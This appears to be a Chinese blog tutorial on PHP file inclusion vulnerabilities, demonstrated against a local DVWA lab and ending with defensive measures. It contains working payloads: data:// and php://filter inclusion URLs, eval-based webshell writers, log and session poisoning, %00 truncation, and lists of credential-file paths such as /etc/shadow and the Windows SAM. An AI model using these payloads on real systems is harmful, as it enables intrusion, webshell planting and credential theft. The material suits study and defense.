0x01 什么是文件包含漏洞
文件包含漏洞是一种常见的web类型漏洞,因为很多脚本语言支持使用文件包含,也就是我们所说的文件包含函数,网站开发者经常会把一些代码插入到指定的地方,从而节省之间避免再次编写 ,这就是包含函数的基础解释 ,但是我们不光可以包含我们预先指定的文件,也可以包含我们服务器内部的其他文件,前提条件就是我们需要有可读的权限才能读取这些文件 ,所以这样就会导致文件包含漏洞
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
什么叫包含呢?
以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。
0x02危害
1、配合文件上传漏洞GetShell
2、可以执行任意脚本代码(php://input) (即使有文件上传也能执行脚本代码)
3、网站源码文件以及配置文件泄露(php://filte/read=convert.base64-encode/resource=bihuo.php)
4、远程包含GetShell
5、控制整个网站甚至是服务器
0x03 漏洞成因
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。
以PHP为例,常用的文件包含函数有以下四种
include(),require(),include_once(),require_once()
区别如下:
require():找不到被包含的文件会产生致命错误,并停止脚本运行
include():找不到被包含的文件只会产生警告,脚本继续执行
require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含
include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含
0x04 文件包含漏洞的环境要求
allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据
allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件
0x05 文件包含漏洞分类
其文件包含漏洞共分为两大类,本地文件包含和远程文件包含,但是如果想要实现远程文件包含,需要php.ini开启了allow_url_fopen和allow_url_include的配置。包含的文件是第三方服务器的文件。本地文件包含的含义就是包含本地服务器的文件
只能够对服务器本地的文件进行包含。本地文件包含漏洞所包含的各类情况如下:
可以包含本地文件,在条件允许时可执行代码
执行上传的图片马,生成webshell。
读取敏感文件,如系统配置文件以及PHP文件等。
包含data:或php://input等伪协议
若有phpinfo则可以包含临时文件
包含日志文件GetShell
包含/proc/self/envion文件GetShell
远程文件包含(RFI)
当php.ini中allow_url_fopen和allow_url_include为On时,文件包含函数是可以加载远程文件的,这类漏洞被称为远程文件包含漏洞。
0x06 基础文件包含漏洞
利用文件包含,我们通过include函数来执行phpinfo.php页面,成功解析
将phpinfo.php文件后缀改为txt后进行访问,依然可以解析
将phpinfo.php文件后缀改为jpg格式,也可以解析
可以看出,include()函数并不在意被包含的文件是什么类型,只要有php代码,都会被解析出来。
但是我们一般不通过php文件上传因为
从靶场服务器访问攻击者的服务器的php文件,只能获取到php执行后的返回结果,而不能获取到php文件源码
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=../../../../Mysql/my.ini
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=D://phpStudy/Mysql/my.ini
一些常见的敏感目录信息路径
Windows系统:
C:\boot.ini //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
C:\windows\repair\sam //存储Windows系统初次安装的密码
C:\ProgramFiles\mysql\my.ini //Mysql配置
C:\ProgramFiles\mysql\data\mysql\user.MYD //MySQL root密码
C:\windows\php.ini //php配置信息
Linux/Unix系统:
/etc/password //账户信息
/etc/shadow //账户密码信息
/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置
/usr/local/app/php5/lib/php.ini //PHP相关配置
/etc/httpd/conf/httpd.conf //Apache配置文件
/etc/my.conf //mysql配置文件
0x07 伪协议应用
PHP内置了很多URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数
file://协议
这个伪协议不受allow_url与allow_url_include的影响
注意:file://协议后面需要跟着绝对路径
file:// [文件的绝对路径和文件名]
payload
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=file://d://phpStudy/www/DVWA-MASTER/index.php
data协议
data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。从而导致任意代码执行。
利用data:// 伪协议可以直接达到执行php代码的效果,例如执行phpinfo()函数:
原文链接:https://blog.csdn.net/m0_46467017/article/details/126380415(data:text/plain)
(伪协议需要allow_url_fopen allow_url_include为on)
payload
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=data:text/plain,<?php file_put_contents('1.php','<?php @eval($_REQUEST[1]); ?>') ?>
因为蚁剑一直连不上,想到可能是受到一些限制,所以我们改为写一个新文件,当这个文件运行的时候就会创建一个新文件,我们用蚁剑去连接新创建的文件
php伪协议
1. php://stdin:代表标准输入流。您可以使用它来读取从控制台输入的数据。
2. php://stdout:代表标准输出流。您可以使用它来将数据输出到控制台。
3. php://stderr:代表标准错误输出流。您可以使用它来输出错误消息到控制台。
4. php://input:用于获取通过HTTP POST请求发送的数据。可以用来接收HTTP请求正文的数据。
5. php://output:用于将数据输出到HTTP响应正文。可以用来发送HTTP响应内容。
6. php://memory:代表内存中的流。您可以使用它来创建一个内存缓冲区,将数据写入其中。
7. php://temp:类似于php://memory,代表内存中的流。通常用于存储临时数据。
8. php://fd:用于访问文件描述符(File Descriptor)。可以打开并操作文件。
9. php://filter:用于过滤数据。您可以使用它来应用各种过滤器和转换器来处理数据。
10. php://glob:用于获取与通配符匹配的文件列表。
这些伪协议可用于处理文件、输入/输出、网络通信以及数据转换等各种任务。它们是PHP的内置功能,提供了灵活性和便捷性,用于访问和操作不同类型的资源。
经常使用的是php://filter和php://input
php://filter用于读取源码。
php://input用于执行php代码。
php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
(伪协议计本都需要allow_url_fopen allow_url_include为on)
php://input协议
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。
需要开启allow_url_include=on,对allow_url_fopen不做要求
如果没有hackbar也可以直接写入php文件,输入file=php://input
,然后使用burp抓包,在请求主体写入php代码
php://filter协议
关联阅读
[谈一谈php://filter的妙用 | 离别歌 (leavesongs.com)](https://www.leavesongs.com/PENETRATION/php-filter-magic.html)
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。
?file=php://input 数据利用POST传过去。 相对路径
只是读取,所以只需要开启allow_url_fopen,对allow_url_include不做要求
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=../../../index.php //能出来但是报错
zip://协议
zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。
zip://中只能传入绝对路径。
要用#分割压缩包和压缩包里的内容,并且#要用url编码成%23
需要PHP 的版本> =5.3.0,#可以自己变成%23
只需要是zip的压缩包即可,后缀名可以任意更改,除了rar
相同的类型还有zlib://和bzip2://
?file=zip://[压缩文件路径]#[压缩文件内的子文件名] 需要绝对路径
如果内部为php则会报错,内部文件需为txt,还需要安装apt-get install -y php-zip
,外部需要为使用zip压缩的
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=zip://D:/phpStudy/WWW/DVWA-master/hackable/uploads/shell.zip%23shell.txt
phar://协议
类似于zip://,但用法不同,zip://伪协议中是用#把压缩文件路径和压缩文件的子文件名隔开,而phar://伪协议中是用/把压缩文件路径和压缩文件的子文件名隔开,
即?file=phar://[压缩文件路径]/[压缩文件内的子文件名] 注意:PHP >=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。
payload
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=phar://../../hackable/uploads/shell.png/shell.php
0x08 本地文件包含漏洞利用
配合文件上传使用
有时候我们找不到文件上传漏洞,无法上传webshell,可以先上传一个图片格式的webshell到服务器,再利用本地文件包含漏洞进行解析。
以DVWA平台为例,将Security Level选择low,编辑一个图片马,内容如下:
<?php
fwrite(fopen("shell.php","w"),'<?php eval($_POST[123]);?>);
?>
找到上传点进行上传
获取文件保存的完整路径
最后利用文件包含读取文件
常见代码
一
二
三 %00截断
四 利用路径长度
利用?截断
包含上传的图片马
包含apache日志文件
有时候网站存在文件包含漏洞,但是却没有文件上传点。这个时候我们还可以通过利用Apache的日志文件来生成一句话木马。
利用条件
对日志文件可读
知道日志文件存储目录
注意点
一般日志储存目录会被修改,需要读取服务器配置文件(httpd.conf,nainx.conf)或者根据phpinfo();中的消息来得知
日志记录中的信息都可以被调整,比如记录的报错等级,或者内容格式
如果我们访问一个不存在的资源,也一样会进行记录,例如访问
http://127.0.0.1<?php phpinfo();?>
查看日志被记录下来
需要去http.conf
--> 开启 CustomLog "logs/access.log" combined
用来开启apache的日志
之后我们在网站随意的地方输入php代码,前面需要有?来区分get传参和路径,下一步需要使用bp进行抓包,因为浏览器会给我们的php代码进行自动编码
之后进入含有文件包含的地方,进行包含Apache日志文件来执行php代码
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=D:/phpStudy/Apache/logs/access.log
包含session文件
利用条件:
找到Session内的可控变量
Session文件可读写,并且知道存储路径
php的session文件的保存路径可以在phpinfo的session.save_path看到。
session常见存储路径:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
session文件格式:sess_[phpsessid],而phpsessid在发送的请求的cookie字段中可以看到。
首先需要写一段这个代码,放在网站的任意路径
<?php
session_start();
$test = $_GET['test'];
$_SESSION['username'] = $test; //注意SESSION大写
?>
下一步,找到自己写的文件进行传值
http://127.0.0.1/session.php?test=<?php phpinfo(); ?> //代码会修改你的session文件,可以写入代码
下一步,进行文件包含session文件
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=D:\phpStudy\tmp\tmp\sess_26e09dp2k37g7r4vi8ihmlad67
session id 需要去cookie中去查看
包含临时文件
php中上传文件,会创建临时文件。在linux下使用/tmp目录,而在windows下使用C:\windows\temp目录。在临时文件被删除前,可以利用时间竞争的方式包含该临时文件。
由于包含需要知道包含的文件名。一种方法是进行暴力猜解,linux下使用的是随机函数有缺陷,而windows下只有65535种不同的文件名,所以这个方法是可行的。
另一种方法是配合phpinfo页面的php variables,可以直接获取到上传文件的存储路径和临时文件名,直接包含即可。
包含ssh日志文件拿shell
ssh '<?php phpinfo(); ?>'@192.168.48.129 //linux系统连接虚拟机的命令
ssh "<?php phpinfo(); ?>"@192.168.1.244 //windows系统连接虚拟机的命令
首先,在命令行使用咱们创造的ssh命令连接虚拟机
查看日志
需要把log文件夹的权限升级为604
,意思就是起码普通用户有读取的权限
kail的ssh的日志文件成功连接的的日志文件在/var/log/wtmp
连接失败的日志文件在/var/log/btmp
使用kali如果报这个错误
Warning: include(): open_basedir restriction in effect. File(/var/log/btmp) is not within the allowed path(s): (/www/admin/localhost_80/wwwroot/:/tmp/:/proc/) in /www/admin/localhost_80/wwwroot/DVWA-master/vulnerabilities/fi/index.php on line 36
Warning: include(/var/log/btmp): failed to open stream: Operation not permitted in /www/admin/localhost_80/wwwroot/DVWA-master/vulnerabilities/fi/index.php on line 36
Warning: include(): Failed opening '/var/log/btmp' for inclusion (include_path='.:/usr/local/phpstudy/soft/php/php-5.5.38/lib/php') in /www/admin/localhost_80/wwwroot/DVWA-master/vulnerabilities/fi/index.php on line 36
则需要按照如下操作
这个错误是因为 PHP 的 open_basedir 限制导致的。open_basedir 是一种 PHP 安全机制,它用于限制 PHP 脚本可以访问的目录。在你的错误消息中,它指示文件 /var/log/btmp 不在允许的路径内。
错误消息的各部分解释如下:
Warning: include(): open_basedir restriction in effect. - 这是一个 PHP 警告,它告诉你 open_basedir 限制正在生效。
File(/var/log/btmp) is not within the allowed path(s): (/www/admin/localhost_80/wwwroot/:/tmp/:/proc/) - 这一部分指出了受限制的文件路径 /var/log/btmp 不在允许的路径列表内,允许的路径包括 /www/admin/localhost_80/wwwroot/、/tmp/ 和 /proc/。
in /www/admin/localhost_80/wwwroot/DVWA-master/vulnerabilities/fi/index.php on line 36 - 这是错误发生的文件和行号。
Warning: include(/var/log/btmp): failed to open stream: Operation not permitted - 这一部分是指 include 函数尝试打开 /var/log/btmp 时失败,因为该操作未被许可。
Warning: include(): Failed opening '/var/log/btmp' for inclusion (include_path='.:/usr/local/phpstudy/soft/php/php-5.5.38/lib/php') - 这是指 include 函数尝试包含 /var/log/btmp 文件时失败。
要解决这个问题,你可以考虑以下几种方法:
修改 open_basedir 设置:你可以修改 PHP 配置中的 open_basedir 设置,以包括 /var/log/btmp 目录,如果安全性允许的话。这需要在 PHP 配置文件(如 php.ini)中进行更改。不过,这需要谨慎处理,确保不引入安全风险。
更改代码:如果可能的话,你也可以更改代码,使其不再尝试包含 /var/log/btmp 文件。
最后还是在centos7中完成实验(因为kali的报错整了一上午没整明白)
使用文件包含,包含整个ssh日志文件
http://192.168.1.244/dvwa/vulnerabilities/fi/?page=/var/log/secure //如果上传错了则需要删除日志文件内全部内容并重启centos,所以输入慎重
0x09 漏洞挖掘
没有通用的挖掘办法(Google搜索include..file=...)
特定的CMS,特定的版本可能存在漏洞(include, require)
Web漏洞扫描器扫描,常见的web漏洞扫描器都支持可以检测。手工挖掘,看参数, filename=xxx,是否可以包含其他文件
0x10 练习
一
后端代码
<?php
show_source(__FILE__);
include('flag.php');
$a = $_GET["a"];
if (isset($a) && ((file_get_contents($a, 'r')) === 'l want flag')) {
echo "success\n";
echo $flag;
}
同文件夹下有一个flag.php
flag{1231231231235sdfadsf}
当我们给a
使用get传参时,传的参数等于l want flag
则会判断成功,输出$flag;
一共有三种方法,需要注意php://input需要使用post传参,data格式可以使用base64编码格式,第三种方法不可以使用linux
二
三
四
<?php
show_source(__FILE__);
$path = @$_GET['path'];
//过滤../、..\,替换为空
$path = str_replace(array('../','..\\'),'', $path);
@include './'.$path;
?>
如果开启了opendir
,蚁剑,哥斯拉都可以进行遍历读取网站所在的盘符(例如网站在D盘,则只能把D盘遍历出来,别的盘不会),如果想切换到别的盘符,则需要使用dos命令
0x10 绕过
本地绕过
%00截断绕过:
原理:
验证源码:
<?php
if(isset($_GET['page'])){ //判断通过GET方式有没有获取到这个文件;
include$_GET['page'].".php"; //通过page传递这个文件的名字,不包括文件后缀名;如果传递一个test,代码拼接.php,如果当前目录下存在test.php,就包含test.php;
}else{
include'home.php'; //否则就包含home.php
}
?>
校验过程:判断是否获取到这个文件-->通过GET方式传递一个文件名,并在文件名后面拼接.php后缀-->如果当前目录下有这个文件,就包含这个文件-->否则就包含home.php
注:
在低版本中php读取文件名时认为%00是终止符,对于%00后面的内容就会失效。
通过上面源码我们知道,通过GET方式传递的这个文件名是我们可以进行控制的,在这里我们可以通过%00截断后面拼接的内容,让后面拼接的内容失效。
实验步骤:
1、制作一个图片马放到test_include目录下,这里的内容不是一句话木马,是phpinfo();代码:内容 <?php phpinfo();?>
2、对1.png进行包含,报错没有这个文件:
3、包含1.png,使用burpsuite对这个文件进行抓包:
4、在1.png后面加上%00,进行00截断,可以看出,成功解析图片马:
点号绕过
其他绕过
远程绕过
PHP的配置文件allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。
allow_url_fopen = On(是否允许打开远程文件)
allow_url_include = On(是否允许include/require远程文件)
0x11 文件包含漏洞防护
1、使用str_replace等方法过滤掉危险字符(., /, \)
2、配置open_basedir,防止目录遍历(open_basedir 将php所能打开的文件限制在指定的目录树中)
3、php版本升级,禁止0字节(\0),防止%00截断
4、对上传的文件进行重命名,防止被读取
5、对于动态包含的文件可以设置一个白名单,不读取非白名单的文件。
6、做好管理员权限划分,做好文件的权限管理,allow_url_include和allow_url_fopen最小权限化
Views: 6